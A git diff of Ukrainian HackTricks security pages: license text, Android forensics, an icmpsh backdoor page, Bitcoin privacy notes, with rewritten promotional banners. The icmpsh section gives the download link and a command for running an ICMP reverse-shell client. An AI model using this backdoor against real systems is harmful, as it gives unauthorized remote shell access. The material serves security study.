відсутності латентних або інших дефектів, точності, або наявності або відсутності помилок, незалежно від того, чи відомі вони або можуть бути виявлені. Де відмови від гарантій не дозволяються повністю або частково, ця відмова може не застосовуватися до Вас.__ -b. __На скільки це можливо, в жодному випадку Ліцензіар не буде нести відповідальність перед Вами за будь-якою правовою теорією (включаючи, без обмежень, недбалість) або інакше за будь-які прямі, спеціальні +b. __На скільки це можливо, в жодному випадку Ліцензіар не буде нести відповідальність перед Вами за будь-якою правовою теорією (включаючи, без обмежень, недбалість) або інакше за будь-які прямі, спеціальні, непрямі, випадкові, побічні, покаральні, ## Розділ 7 - Інші Умови та Умови. -a. Ліцензіар не буде зв'язаний будь-якими додатковими або відмінними умовами, які були передані Вами, якщо не буде виразно погоджено інше. +a. Ліцензіар не буде зв'язаний будь-якими додатковими або відмінними умовами, які були передані Вами, якщо це не було виразно узгоджено. -b. Будь-які угоди, розуміння або угоди щодо Ліцензійного Матеріалу, які не вказані тут, є окремими від умов цієї Публічної Ліцензії. +b. Будь-які угоди, розуміння або угоди щодо Ліцензійного матеріалу, які не зазначені тут, є окремими від умов цієї Публічної Ліцензії. ## Розділ 8 - Тлумачення. -a. Для уникнення сумнівів, ця Публічна Ліцензія не зменшує, не обмежує, не обмежує або не накладає умов на будь-яке використання Ліцензійного Матеріалу, яке може бути законно здійснене без дозволу за цією Публічною Ліцензією. +a. На уникнення сумнівів, ця Публічна Ліцензія не зменшує, не обмежує, не обмежує або не накладає умов на будь-яке використання Ліцензійного матеріалу, яке може бути законно здійснене без дозволу за цією Публічною Ліцензією. b. На скільки це можливо, якщо будь-яка умова цієї Публічної Ліцензії вважається невиконуваною, вона автоматично буде перероблена до мінімального необхідного рівня для забезпечення її виконання. Якщо умову не можна переробити, вона буде відокремлена від цієї Публічної Ліцензії без впливу на виконуваність залишкових умов та умов. -c. Жодна умова цієї Публічної Ліцензії не буде скасована, і ніякого порушення не буде погоджено, якщо це не буде виразно погоджено Ліцензіаром. +c. Жодна умова цієї Публічної Ліцензії не буде скасована, і ніякого порушення не буде допущено без виразної згоди Ліцензіара. -d. Ніщо в цій Публічній Ліцензії не становить або не може бути тлумачено як обмеження або відмова від будь-яких привілеїв та недоторканностей, які застосовуються до Ліцензіара або Вас, включаючи від юридичних процесів будь-якої юрисдикції або влади. +d. Ніщо в цій Публічній Ліцензії не становить або не може бути тлумачено як обмеження або відмова від будь-яких привілеїв та недоторканності, які застосовуються до Ліцензіара або Вас, включаючи від юридичних процесів будь-якої юрисдикції або влади. ``` Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/). ``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/android-forensics.md b/android-forensics.md index bdbf113ac..94bd4bf61 100644 --- a/android-forensics.md +++ b/android-forensics.md @@ -1,18 +1,19 @@ # Аналіз Android +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Дізнайтеся про [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Заблокований пристрій @@ -26,7 +27,7 @@ Створіть [резервну копію Android за допомогою adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) та видобудьте її за допомогою [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` -### Якщо є root-доступ або фізичне підключення до інтерфейсу JTAG +### Якщо є доступ до root або фізичне підключення до інтерфейсу JTAG * `cat /proc/partitions` (шукайте шлях до флеш-пам'яті, зазвичай першим записом є _mmcblk0_ і відповідає цілій флеш-пам'яті). * `df /data` (Дізнайтеся розмір блоку системи). @@ -35,3 +36,18 @@ ### Пам'ять Використовуйте Linux Memory Extractor (LiME), щоб видобути інформацію про ОЗП. Це розширення ядра, яке повинно бути завантажене через adb. + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} diff --git a/backdoors/icmpsh.md b/backdoors/icmpsh.md index 743f35743..9eac7ed9a 100644 --- a/backdoors/icmpsh.md +++ b/backdoors/icmpsh.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} Завантажте backdoor з: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) @@ -19,7 +20,7 @@ Виконайте скрипт: **run.sh** -**Якщо ви отримуєте якусь помилку, спробуйте змінити рядки:** +**Якщо ви отримуєте помилку, спробуйте змінити рядки:** ```bash IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1) IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') @@ -35,16 +36,17 @@ read IP ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Школа HackTricks для експертів червоної команди AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа HackTricks для експертів червоної команди GCP (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/blockchain/blockchain-and-crypto-currencies/README.md b/blockchain/blockchain-and-crypto-currencies/README.md index 2897284ce..8d84ec6ea 100644 --- a/blockchain/blockchain-and-crypto-currencies/README.md +++ b/blockchain/blockchain-and-crypto-currencies/README.md @@ -1,17 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
- +{% endhint %} ## Основні концепції @@ -20,7 +20,7 @@ - **Токени та монети** різняться тим, що монети служать як цифрові гроші, тоді як токени представляють вартість або власність у конкретних контекстах. - **Утилітарні токени** надають доступ до послуг, а **Безпечні токени** позначають власність активів. - **DeFi** означає Децентралізовану Фінансову систему, що пропонує фінансові послуги без центральних органів. -- **DEX** та **DAOs** посилаються на Децентралізовані платформи обміну та Децентралізовані автономні організації відповідно. +- **DEX** та **DAOs** вказують на Децентралізовані платформи обміну та Децентралізовані автономні організації відповідно. ## Механізми консенсусу @@ -32,12 +32,12 @@ ### Транзакції -Транзакції Bitcoin включають переказ коштів між адресами. Транзакції перевіряються за допомогою цифрових підписів, забезпечуючи, що тільки власник приватного ключа може ініціювати перекази. +Транзакції Bitcoin включають переказ коштів між адресами. Транзакції перевіряються за допомогою цифрових підписів, забезпечуючи, що лише власник приватного ключа може ініціювати перекази. #### Ключові компоненти: - **Мультипідписні транзакції** вимагають декілька підписів для авторизації транзакції. -- Транзакції складаються з **входів** (джерело коштів), **виходів** (призначення), **комісії** (сплачується майнерам) та **скриптів** (правила транзакції). +- Транзакції складаються з **входів** (джерело коштів), **виходів** (призначення), **комісії** (сплачено майнерам) та **скриптів** (правила транзакції). ### Мережа Lightning @@ -45,83 +45,49 @@ ## Проблеми приватності Bitcoin -Атаки на приватність, такі як **Спільна власність входів** та **Виявлення адрес зміни UTXO**, використовують шаблони транзакцій. Стратегії, такі як **Міксери** та **CoinJoin**, покращують анонімність, затемнюючи зв'язки транзакцій між користувачами. +Атаки на приватність, такі як **Власність спільного входу** та **Виявлення адреси зміни UTXO**, використовують шаблони транзакцій. Стратегії, такі як **Міксери** та **CoinJoin**, покращують анонімність, приховуючи зв'язки транзакцій між користувачами. ## Анонімне отримання Bitcoin -Методи включають готівкові угоди, майнінг та використання міксерів. **CoinJoin** змішує кілька транзакцій для ускладнення відстежуваності, тоді як **PayJoin** маскує CoinJoin як звичайні транзакції для підвищення приватності. - - -# Атаки на приватність Bitcoin - -# Підсумок атак на приватність Bitcoin - -У світі Bitcoin приватність транзакцій та анонімність користувачів часто є предметами занепокоєнь. Ось спрощений огляд кількох загальних методів, за допомогою яких атакувальники можуть порушити приватність Bitcoin. - -## **Припущення про спільну власність входів** - -Зазвичай рідко комбінуються входи від різних користувачів в одній транзакції через складність. Таким чином, **два вхідні адреси в одній транзакції часто вважаються належними одному власнику**. - -## **Виявлення адрес зміни UTXO** - -UTXO, або **Невитрачений вихід транзакції**, повинен бути повністю витрачений у транзакції. Якщо лише частина нього відправляється на іншу адресу, залишок йде на нову адресу зміни. Спостерігачі можуть припустити, що ця нова адреса належить відправнику, порушуючи приватність. - -### Приклад -Для пом'якшення цього, служби змішування або використання кількох адрес можуть допомогти затемнити власність. - -## **Викладення в соціальних мережах та форумах** - -Користувачі іноді публікують свої адреси Bitcoin в Інтернеті, що робить його **легким для посилання адреси на її власника**. - -## **Аналіз графіка транзакцій** - -Транзакції можуть бути візуалізовані у вигляді графіків, розкриваючи потенційні зв'язки між користувачами на основі потоку коштів. - -## **Неоптимальний евристичний вхід (Оптимальний евристичний зміни)** - -Цей евристичний заснований на аналізі транзакцій з кількома входами та виходами для вгадування, який вихід є зміною, що повертається відправнику. - -### Приклад +Методи включають готівкові угоди, майнінг та використання міксерів. **CoinJoin** змішує декілька транзакцій для ускладнення відстежуваності, тоді як **PayJoin** маскує CoinJoin як звичайні транзакції для підвищення приватності. ```bash 2 btc --> 4 btc 3 btc 1 btc ``` -Якщо додавання додаткових входів робить зміну виходу більшою, ніж будь-який окремий вхід, це може заплутати евристичний аналіз. - -## **Примусове Повторне Використання Адреси** +## **Примусове Повторне Використання Адрес** Атакувальники можуть надсилати невеликі суми на раніше використані адреси, сподіваючись, що отримувач поєднає їх з іншими входами у майбутніх транзакціях, тим самим пов'язуючи адреси між собою. ### Правильна Поведінка Гаманця -Гаманці повинні уникати використання монет, отриманих на вже використаних, порожніх адресах, щоб уникнути цього витоку конфіденційності. +Гаманці повинні уникати використання монет, отриманих на вже використаних, порожніх адресах, щоб запобігти цьому витоку приватності. ## **Інші Техніки Аналізу Блокчейну** - **Точні Суми Платежів:** Транзакції без здачі ймовірно здійснюються між двома адресами, що належать одному користувачеві. - **Круглі Числа:** Кругле число в транзакції вказує на платіж, а некруглий вихід ймовірно є здачею. - **Відбиток Гаманця:** Різні гаманці мають унікальні шаблони створення транзакцій, що дозволяє аналітикам ідентифікувати використане програмне забезпечення та, можливо, адресу здачі. -- **Кореляція Суми та Часу:** Розкриття часів або сум може зробити транзакції відстежуваними. +- **Кореляція Суми та Часу:** Розголошення часу або сум може зробити транзакції відстежуваними. ## **Аналіз Трафіку** -Моніторинг мережевого трафіку дозволяє атакувальникам потенційно пов'язувати транзакції або блоки з IP-адресами, порушуючи конфіденційність користувача. Це особливо справджується, якщо суб'єкт працює з багатьма вузлами Bitcoin, підвищуючи їх здатність до моніторингу транзакцій. +Спостерігаючи за мережевим трафіком, атакувальники можуть потенційно пов'язувати транзакції або блоки з IP-адресами, порушуючи приватність користувачів. Це особливо справджується, якщо суб'єкт працює з багатьма вузлами Bitcoin, підвищуючи їхню здатність моніторити транзакції. ## Додатково -Для повного списку атак на конфіденційність та захисту відвідайте [Конфіденційність Bitcoin на Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). +Для повного списку атак на приватність та захисту відвідайте [Про Приватність Bitcoin на Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). # Анонімні Транзакції Bitcoin ## Способи Отримання Біткоїнів Анонімно -- **Готівкові Транзакції**: Отримання біткоїнів через готівку. -- **Альтернативи Готівки**: Придбання подарункових карток та їх обмін онлайн на біткоїни. -- **Майнінг**: Найбільш приватний спосіб заробити біткоїни - це майнінг, особливо коли він виконується самостійно, оскільки пули для майнінгу можуть знати IP-адресу майнера. [Інформація про Пули для Майнінгу](https://en.bitcoin.it/wiki/Pooled_mining) -- **Крадіжка**: Теоретично, крадіжка біткоїнів може бути ще одним способом отримання їх анонімно, хоча це незаконно та не рекомендується. +- **Готівкові Транзакції**: Отримання біткоїнів за допомогою готівки. +- **Альтернативи Готівці**: Придбання подарункових карток та їх обмін онлайн на біткоїни. +- **Майнінг**: Найбільш приватний спосіб заробляти біткоїни - це майнінг, особливо коли він виконується самостійно, оскільки майнінгові пули можуть знати IP-адресу майнера. [Інформація про Майнінгові Пули](https://en.bitcoin.it/wiki/Pooled_mining) +- **Крадіжка**: Теоретично, крадіжка біткоїнів може бути ще одним способом отримати їх анонімно, хоча це незаконно та не рекомендується. ## Сервіси Змішування -Використовуючи сервіс змішування, користувач може **надсилати біткоїни** та отримувати **інші біткоїни в обмін**, що ускладнює відстеження оригінального власника. Однак це вимагає довіри до сервісу щодо відсутності журналів та фактичного повернення біткоїнів. Альтернативні варіанти змішування включають Bitcoin казино. +Використовуючи сервіс змішування, користувач може **надсилати біткоїни** та отримувати **інші біткоїни в обмін**, що ускладнює відстеження оригінального власника. Однак це потребує довіри до сервісу не зберігати журнали та фактично повертати біткоїни. Альтернативні варіанти змішування включають Bitcoin казино. ## CoinJoin @@ -133,14 +99,15 @@ UTXO, або **Невитрачений вихід транзакції**, по ## PayJoin -Варіант CoinJoin, **PayJoin** (або P2EP), маскує транзакцію між двома сторонами (наприклад, клієнтом та продавцем) як звичайну транзакцію, без характерних рівних виходів, що є характерним для CoinJoin. Це робить його надзвичайно важким для виявлення та може скасувати евристичний аналіз спільної власності входів, який використовують сутності моніторингу транзакцій. +Варіант CoinJoin, **PayJoin** (або P2EP), маскує транзакцію між двома сторонами (наприклад, клієнтом та продавцем) як звичайну транзакцію, без характерних рівних виходів, що є ознакою CoinJoin. Це робить важко виявити та може скасувати евристичний метод власності спільного входу, який використовують сутності моніторингу транзакцій. ```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` Транзакції, подібні до вищезазначених, можуть бути PayJoin, підвищуючи конфіденційність, залишаючись нерозрізненними від стандартних транзакцій біткоїн. -**Використання PayJoin може значно нарушити традиційні методи спостереження**, що робить його перспективним розвитком у забезпеченні конфіденційності транзакцій. +**Використання PayJoin може значно нарушити традиційні методи спостереження**, що робить його перспективним розвитком у зусиллях забезпечення конфіденційності транзакцій. + # Найкращі практики з конфіденційності в криптовалютах @@ -153,16 +120,16 @@ UTXO, або **Невитрачений вихід транзакції**, по ## **Використання Tor для анонімності** -Оскільки Bitcoin працює на мережі пір-у-пір, рекомендується використання Tor для маскування вашої IP-адреси, підвищуючи конфіденційність при взаємодії з мережею. +Оскільки Bitcoin працює на мережі пір-до-піра, рекомендується використовувати Tor для маскування вашої IP-адреси, підвищуючи конфіденційність при взаємодії з мережею. ## **Запобігання повторному використанню адрес** -Для забезпечення конфіденційності важливо використовувати нову адресу для кожної транзакції. Повторне використання адрес може піддавати конфіденційність ризику, пов'язуючи транзакції з тією самою сутністю. Сучасні гаманці відгороджують від повторного використання адрес через їх дизайн. +Для забезпечення конфіденційності важливо використовувати нову адресу для кожної транзакції. Повторне використання адрес може піддавати конфіденційність ризику, пов'язуючи транзакції з тією самою сутністю. Сучасні гаманці відгороджують від повторного використання адрес через свій дизайн. ## **Стратегії для конфіденційності транзакцій** - **Декілька транзакцій**: Розбиття платежу на кілька транзакцій може затемнити суму транзакції, ускладнюючи атаки на конфіденційність. -- **Уникання здачі**: Вибір транзакцій, які не потребують виходів здачі, підвищує конфіденційність, заважаючи методам виявлення здачі. +- **Уникання здачі**: Вибір транзакцій, які не потребують видачі здачі, підвищує конфіденційність, заважаючи методам виявлення здачі. - **Декілька виходів здачі**: Якщо уникнути здачі неможливо, генерація декількох виходів здачі все ще може покращити конфіденційність. # **Monero: Стягнення анонімності** @@ -173,10 +140,20 @@ Monero відповідає потребі в абсолютній анонім ## **Розуміння Газу** -Газ вимірює обчислювальні зусилля, необхідні для виконання операцій на Ethereum, ціновою величиною в **gwei**. Наприклад, транзакція, яка коштує 2 310 000 gwei (або 0,00231 ETH), включає обмеження газу та базову комісію, з чайовим для стимулювання майнерів. Користувачі можуть встановити максимальну комісію, щоб не переплачувати, з надлишком, який буде повернуто. +Газ вимірює обчислювальні зусилля, необхідні для виконання операцій на Ethereum, вимірюється в **gwei**. Наприклад, транзакція, яка коштує 2,310,000 gwei (або 0.00231 ETH), включає ліміт газу, базову плату та чайові для стимулювання майнерів. Користувачі можуть встановити максимальну плату, щоб не переплачувати, зайве буде повернуто. ## **Виконання Транзакцій** -Транзакції в Ethereum включають відправника та отримувача, які можуть бути адресами користувача або смарт-контрактами. Вони потребують комісії та повинні бути добиті. Основна інформація в транзакції включає отримувача, підпис відправника, значення, необов'язкові дані, обмеження газу та комісії. Зокрема, адреса відправника виводиться з підпису, що усуває необхідність у ньому в даних транзакції. +Транзакції в Ethereum включають відправника та отримувача, які можуть бути адресами користувача або смарт-контрактами. Вони потребують плату та повинні бути добиті. Основна інформація в транзакції включає отримувача, підпис відправника, значення, необов'язкові дані, ліміт газу та плату. Зокрема, адреса відправника виводиться з підпису, що усуває необхідність у ньому в даних транзакції. -Ці практики та механізми є основою для кожного, хто бажає працювати з криптовалютами, надаючи перевагу конфіденційності та безпеці. +Ці практики та механізми є основою для всіх, хто бажає працювати з криптовалютами, надаючи перевагу конфіденційності та безпеці. + + +## References + +* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake) +* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) +* [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions) +* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/) +* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/) +* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse) diff --git a/burp-suite.md b/burp-suite.md index 28ca41492..90b90c116 100644 --- a/burp-suite.md +++ b/burp-suite.md @@ -1,23 +1,24 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
